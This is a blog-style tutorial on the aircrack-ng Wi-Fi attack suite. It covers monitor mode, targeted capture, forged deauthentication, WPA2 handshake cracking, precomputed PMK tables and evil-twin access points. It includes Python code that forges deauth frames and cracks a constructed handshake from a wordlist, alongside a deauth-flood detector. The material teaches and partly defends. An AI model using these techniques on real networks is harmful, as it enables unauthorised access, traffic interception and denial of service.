Understanding the Aircrack-Ng Suite of Wi-Fi Hacking Tools


Welcome back Script Kiddies!

Note: This is not a hacking tutorial. We are only going to learn the Aircrack-Ng Suite of #WiFi Hacking Tools.

Today we'll be talking about the best-known Wi-Fi hacking software, aircrack-ng. We'll be using aircrack-ng in nearly all of the subsequent hacks, so it's wise to start with some basics on what is included and how to use each piece. We'll be using Kali Linux, which ships the whole suite, in most of our hacks, so install Kali before you get started.

Aircrack-ng is not a single tool, but rather a suite of tools for capturing, manipulating and cracking Wi-Fi networks. Within this suite there is a tool called aircrack-ng for cracking keys, but before we can crack anything we need to go through several steps using the other tools. In addition, the suite can perform denial-of-service (deauthentication) attacks, run rogue access points and evil twins, mount client-side attacks such as Caffe Latte, and more.
Note: The "-ng" stands for "new generation", as aircrack-ng replaced an older suite called aircrack that is no longer maintained.

SO LET'S GET STARTED:

First, check that Kali recognizes your Wi-Fi adapter. We can do this on any Linux system by typing:
                                                                $ iwconfig

On recent Kali releases iwconfig is deprecated and may not be installed; `iw dev` lists the same wireless interfaces. If your adapter is not listed at all, no amount of aircrack-ng will help: fix the driver first.


1. Airmon-ng
The first tool we will look at, and one we need in nearly every Wi-Fi hack, is airmon-ng, which puts our wireless card into monitor mode. Yes, that means our wireless card will listen to everyone!
Well, that's almost correct. Monitor mode is the 802.11 cousin of promiscuous mode, but it goes further. A wired card in promiscuous mode accepts every frame on its segment instead of only frames addressed to its own MAC; a wireless card in promiscuous mode still has to be associated with an access point and only sees that one network. A card in monitor mode is not associated with anything and receives every 802.11 frame on its channel, including the management frames (beacons, probes, deauthentications) and the WPA handshakes we will need later. Not every chipset and driver supports monitor mode and injection, so check the aircrack-ng compatibility list before buying an adapter.
We start this tool by typing airmon-ng, the action (start/stop), and then the interface we want to use (wlan0):
                                                             
                                                                $ airmon-ng start wlan0


Airmon-ng responds with some key information on our wireless adapter, including the chipset and driver. Most importantly, note that it has created a new monitor-mode interface: older versions of the suite call it mon0, current versions call it wlan0mon. Use whichever name airmon-ng prints in the commands that follow. If airmon-ng warns that NetworkManager or wpa_supplicant could interfere with the card, `airmon-ng check kill` stops them for the duration of the session (remember to restart them afterwards).

2. Airodump-ng
Now that we have set our wireless card to monitor mode, we need to capture the packets we are interested in. The next tool in the aircrack-ng suite is airodump-ng, which does exactly that; it is the tool that captures the WPA handshake that aircrack-ng later cracks, and for WEP it collects the IVs. We activate it by typing the airodump-ng command followed by the monitor interface (mon0 or wlan0mon, whichever airmon-ng created):

                                                                 $ airodump-ng mon0

Airodump-ng displays all of the APs (access points) within range with their BSSID (MAC address), signal power, the number of beacon frames seen, the number of data packets, the channel, the speed, the encryption method (OPN, WEP, WPA, WPA2), the cipher (WEP, TKIP, CCMP), the authentication method (PSK or MGT) and finally the ESSID (the network name). Below the AP table it lists the stations (clients) it has seen and which BSSID each is associated with. For our purposes the most important fields are the BSSID and the channel: once we have chosen a target we lock the capture onto it and write it to disk with `airodump-ng --bssid <BSSID> -c <channel> -w <prefix> mon0`, because a card that keeps hopping across channels will miss most of the handshake.
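Airodump-ng also writes the same table to `<prefix>-01.csv` when run with `-w`. The following is an added example, not code from the aircrack-ng project: a small Python parser for that CSV layout that picks out the two fields the next step needs (BSSID and channel), lists the clients of a chosen AP, and builds the locked-on airodump-ng command line. The sample CSV, the MAC addresses and the ESSIDs in it are constructed for this example.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# an access-point table, a blank line, then a station table.
# Every MAC address, name and count below is made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-05-01 10:00:01, 2024-05-01 10:05:12,  6,  54, WPA2, CCMP, PSK, -45,  120,   35,   0.  0.  0.  0,   7, HomeNet,
66:77:88:99:AA:BB, 2024-05-01 10:00:03, 2024-05-01 10:05:10, 11,  54, WEP, WEP, , -70,   80, 1500,   0.  0.  0.  0,   9, OldRouter,
CC:DD:EE:FF:00:11, 2024-05-01 10:00:05, 2024-05-01 10:05:11,  1,  54, OPN, , , -80,   40,    0,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-05-01 10:00:02, 2024-05-01 10:05:12, -50,  300, 00:11:22:33:44:55, HomeNet
AA:BB:CC:DD:EE:02, 2024-05-01 10:01:00, 2024-05-01 10:04:30, -60,   20, 00:11:22:33:44:55,
AA:BB:CC:DD:EE:03, 2024-05-01 10:02:00, 2024-05-01 10:05:00, -65,    5, (not associated), HomeNet,CoffeeShop
"""


def _rows(section):
    """Parse one table of the CSV into dicts keyed by the stripped header names."""
    reader = csv.reader(io.StringIO(section), skipinitialspace=True)
    rows = [[c.strip() for c in r] for r in reader if any(c.strip() for c in r)]
    header, body = rows[0], rows[1:]
    out = []
    for r in body:
        # "Probed ESSIDs" is itself comma-separated, so fold overflow columns back into it.
        if len(r) > len(header):
            r = r[:len(header) - 1] + [",".join(r[len(header) - 1:])]
        out.append(dict(zip(header, r)))
    return out


def parse_airodump_csv(text):
    """Return (access_points, stations) from airodump-ng's CSV output."""
    text = text.replace("\r\n", "\n").strip("\n")
    ap_part, _, station_part = text.partition("\n\n")
    return _rows(ap_part), _rows(station_part)


def choose_target(aps, essid):
    """The two fields the capture step needs: the BSSID and the channel to lock onto."""
    for ap in aps:
        if ap["ESSID"] == essid:
            return ap["BSSID"], int(ap["channel"])
    return None


def clients_of(stations, bssid):
    """Stations associated with a BSSID (the ones whose handshake we can capture)."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


def airodump_command(bssid, channel, interface, prefix):
    """argv that locks airodump-ng onto one AP and writes the capture to <prefix>-01.cap."""
    return ["airodump-ng", "--bssid", bssid, "-c", str(channel), "-w", prefix, interface]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in aps:
        print(f'{ap["BSSID"]}  ch {ap["channel"]:>2}  {ap["Privacy"]:<5} {ap["ESSID"]}')
    bssid, channel = choose_target(aps, "HomeNet")
    print("clients of", bssid, "->", clients_of(stations, bssid))
    print(" ".join(airodump_command(bssid, channel, "wlan0mon", "homenet")))
```

The station table matters as much as the AP table: a WPA handshake can only be captured when a client (re)connects, so an AP with no listed clients is a poor target no matter how strong its signal.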

3. Aircrack-ng
Aircrack-ng is the primary application within the aircrack-ng suite and the one that actually cracks keys. For WEP it uses statistical attacks (PTW, KoreK) to recover the key from the captured IVs. For WPA and WPA2-PSK it runs a dictionary attack: once airodump-ng has captured a client's four-way handshake, aircrack-ng derives the PMK from each candidate passphrase and the ESSID and checks it against the MIC in the handshake, so it only ever finds passphrases that are in the wordlist.

4. Aireplay-ng
Aireplay-ng is another powerful tool in our aircrack-ng arsenal; it injects frames to generate or accelerate traffic on the AP. This is especially useful in attacks like a deauthentication attack that bumps clients off the access point (forcing them to reconnect so that airodump-ng can capture a fresh WPA handshake), WEP key attacks, and ARP injection and replay attacks. Aireplay-ng can obtain the packets it replays from two sources: a live stream of packets, or a pre-captured pcap file (pcap is the standard file type of packet capture libraries like libpcap and WinPcap; if you've ever used Wireshark, you've most likely worked with pcap files).

Its attack modes include deauth, fake authentication, interactive packet replay, arpreplay (necessary for fast WEP cracking), chopchop and fragmentation (which recover the keystream of a WEP packet, and so decrypt it, without recovering the key), caffe-latte (attacking the client side), and others. Injection requires a driver that supports it; `aireplay-ng --test <interface>` checks whether yours does. Also note that deauthentication only works because 802.11 management frames are normally sent unauthenticated; networks that enforce 802.11w (Protected Management Frames) discard forged deauths.

These four tools in the aircrack-ng suite are our Wi-Fi hacking workhorses. We'll use each of them in nearly every Wi-Fi hack. Some of our more hack-specific tools include airdecap-ng, airtun-ng, airolib-ng and airbase-ng. Let's take a brief look at each of these.
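To make the deauth point concrete, here is an added example in Python (not aireplay-ng's own code) that builds a deauthentication frame byte for byte, parses it back, and then does the defender's job of flagging the burst of unprotected deauths that such an attack produces. It shows why the attack needs no key at all: the frame is a 24-byte management header with three MAC addresses and a 2-byte reason code, and nothing in it is authenticated unless 802.11w is in use. The MAC addresses and the burst are constructed for the example.

```python
import struct
from collections import Counter

MGMT = 0                  # 802.11 frame type: management
DEAUTH = 0x0C             # management subtype: deauthentication
PROTECTED_FLAG = 0x4000   # frame-control "protected frame" bit (set under 802.11w)
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3 = 7         # "class 3 frame received from nonassociated station"
REASON_LEAVING = 3        # "deauthenticated because sending station is leaving"


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def build_deauth(dst, src, bssid, seq, reason=REASON_CLASS3):
    """A bare deauthentication frame: 24-byte management header plus a 2-byte reason code.
    Addresses are receiver, transmitter, BSSID; all fields are little-endian per 802.11."""
    frame_control = (DEAUTH << 4) | (MGMT << 2)       # protocol version 0, no flags set
    header = (struct.pack("<HH", frame_control, 0x013A)  # frame control, duration
              + mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid)
              + struct.pack("<H", seq << 4))            # sequence number, fragment 0
    return header + struct.pack("<H", reason)


def parse_frame(frame):
    """Decode the management header; adds the reason code when the frame is a deauth."""
    fc, = struct.unpack_from("<H", frame, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "protected": bool(fc & PROTECTED_FLAG),
        "dst": bytes_to_mac(frame[4:10]),
        "src": bytes_to_mac(frame[10:16]),
        "bssid": bytes_to_mac(frame[16:22]),
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
    }
    if info["type"] == MGMT and info["subtype"] == DEAUTH:
        info["reason"], = struct.unpack_from("<H", frame, 24)
    return info


def deauth_flood_sources(frames, threshold):
    """BSSIDs that sent at least `threshold` unprotected deauths in the window.
    A single deauth is normal housekeeping; dozens in a row are a forged-deauth attack."""
    counts = Counter()
    for f in frames:
        p = parse_frame(f)
        if p["type"] == MGMT and p["subtype"] == DEAUTH and not p["protected"]:
            counts[p["bssid"]] += 1
    return sorted(b for b, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    ap, client = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"   # constructed addresses
    # A burst of broadcast deauths spoofed from the AP, as a deauth attack sends them.
    burst = [build_deauth(BROADCAST, ap, ap, i) for i in range(64)]
    # One genuine deauth from a client leaving a different network.
    quiet = [build_deauth(ap, client, "66:77:88:99:aa:bb", 1, REASON_LEAVING)]
    print(burst[0].hex())
    print(parse_frame(burst[0]))
    print("flood sources:", deauth_flood_sources(burst + quiet, 10))
```

The frame carries no sender secret, which is exactly why a monitor-mode card can forge it and why 802.11w fixes the problem by adding a MIC (and setting the protected bit) on deauthentication and disassociation frames; a detector like the one above should treat a high rate of unprotected deauths per BSSID as an alert, not the presence of any single one.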


5. Airdecap-ng
Airdecap-ng enables us to decrypt captured wireless traffic once we have the key. For WEP the key decrypts everything straight away. For WPA/WPA2-PSK there is a catch: the passphrase is only used to derive a fresh per-session key during each client's four-way handshake, so airdecap-ng can decrypt a client's traffic only if the capture also contains that client's handshake. In other words, once we have the key, not only can we use the access point, but with airdecap-ng we can decrypt the traffic of every client whose handshake we captured and watch everything they're doing (the same key is used for both access and encryption).

6. Airtun-ng
Airtun-ng creates a virtual tunnel (tun) interface that hands us the decrypted traffic of a wireless network as ordinary packets. We can use it to run an IDS on the wireless traffic to detect malicious or other traffic on the access point. So, if we're looking to get an alert on a particular type of traffic (see my tutorial on creating a PRISM-like spy tool), we can use airtun-ng to set up a virtual tunnel that feeds an IDS like Snort, which then sends us the alerts.

7. Airolib-ng
Airolib-ng stores and manages lists of ESSIDs (access point names) and passwords, and precomputes the PMK for every pair. Because the WPA/WPA2 key derivation uses the ESSID as a salt, a precomputed table is only valid for that ESSID, but it turns the expensive part of each guess into a lookup and greatly speeds up WPA/WPA2 cracking (aircrack-ng reads these tables with the -r option).
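The aircrack-ng and airolib-ng sections above describe the same computation from two sides, so here is one added Python example (not the project's code) that does both: it derives the PMK, PTK and EAPOL MIC exactly as the WPA2-PSK four-way handshake specifies, cracks a handshake by trying a wordlist the way aircrack-ng does, and then shows the airolib-ng idea of precomputing the PMKs for one ESSID and reusing them. The handshake itself (MAC addresses, nonces, EAPOL message 2, and the passphrase "password" on ESSID "IEEE") is constructed for the example; the one thing that is not made up is that the PMK for that passphrase/ESSID pair is the IEEE 802.11i reference test vector, which is how we know the PBKDF2 step is right.

```python
import hashlib
import hmac


def wpa_pmk(passphrase, essid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    The ESSID is the salt, which is why a precomputed table is only valid for one ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def wpa_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """IEEE 802.11i PRF-512: the 64-byte PTK. Its first 16 bytes are the KCK that keys the MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return ptk[:64]


def eapol_mic(kck, eapol, key_version):
    """MIC over the EAPOL-Key frame with its MIC field zeroed:
    HMAC-MD5 for key descriptor version 1 (TKIP), HMAC-SHA1 for version 2 (CCMP), 16 bytes."""
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, eapol, digest).digest()[:16]


def pmk_matches(hs, pmk):
    """The check aircrack-ng performs per candidate: does this PMK reproduce the captured MIC?"""
    kck = wpa_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["key_version"]), hs["mic"])


def crack_handshake(hs, wordlist):
    """Dictionary attack (aircrack-ng -w): PBKDF2 for every candidate, then the MIC test."""
    for candidate in wordlist:
        if pmk_matches(hs, wpa_pmk(candidate, hs["essid"])):
            return candidate
    return None


def precompute_pmks(essid, wordlist):
    """The airolib-ng idea: pay the PBKDF2 cost once per (ESSID, passphrase) pair."""
    return {w: wpa_pmk(w, essid) for w in wordlist}


def crack_with_table(hs, table):
    """Same attack, but each guess is now one cheap PRF + HMAC instead of 4096 HMAC rounds."""
    for candidate, pmk in table.items():
        if pmk_matches(hs, pmk):
            return candidate
    return None


# Constructed handshake material (assumed values, not a real capture).
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("aabbccddee01")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_M2 = (
    bytes.fromhex("0103")          # EAPOL version 1, packet type 3 (EAPOL-Key)
    + (95).to_bytes(2, "big")      # body length
    + bytes.fromhex("02")          # descriptor type: RSN (WPA2)
    + bytes.fromhex("010a")        # key information: version 2, pairwise, MIC bit set
    + bytes.fromhex("0000")        # key length
    + (1).to_bytes(8, "big")       # replay counter
    + SNONCE                       # key nonce (message 2 carries the SNonce)
    + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID
    + bytes(16)                    # MIC field zeroed, as it must be for the calculation
    + bytes.fromhex("0000")        # key data length
)


def make_demo_handshake(passphrase="password", essid="IEEE"):
    """Build a self-consistent handshake whose MIC was produced with `passphrase`."""
    kck = wpa_ptk(wpa_pmk(passphrase, essid), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return {"essid": essid, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_M2,
            "key_version": 2, "mic": eapol_mic(kck, EAPOL_M2, 2)}


if __name__ == "__main__":
    hs = make_demo_handshake()
    wordlist = ["letmein", "Password1", "hunter2", "password", "qwerty"]
    print("aircrack-ng style:", crack_handshake(hs, wordlist))
    table = precompute_pmks("IEEE", wordlist)          # airolib-ng style, built once
    print("airolib-ng style: ", crack_with_table(hs, table))
```

Two things follow directly from the code. The MIC is a keyed hash of the EAPOL frame, so the crack is a straight offline guess-and-check and the only defence is a passphrase that is not in any wordlist. And since `wpa_pmk` salts with the ESSID, an airolib-ng table built for "IEEE" is useless against a network called anything else, which is also why default ESSIDs are the ones worth precomputing.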

8. Airbase-ng
Airbase-ng enables us to turn our laptop and wireless card into an access point. This is especially useful for rogue access point and evil twin attacks. Basically, airbase-ng lets us attack the clients rather than the AP: by advertising an ESSID the clients already know, it encourages them to associate with us rather than the real AP.

THAT'S IT FOR NOW.
 #HAPPY #HACKING
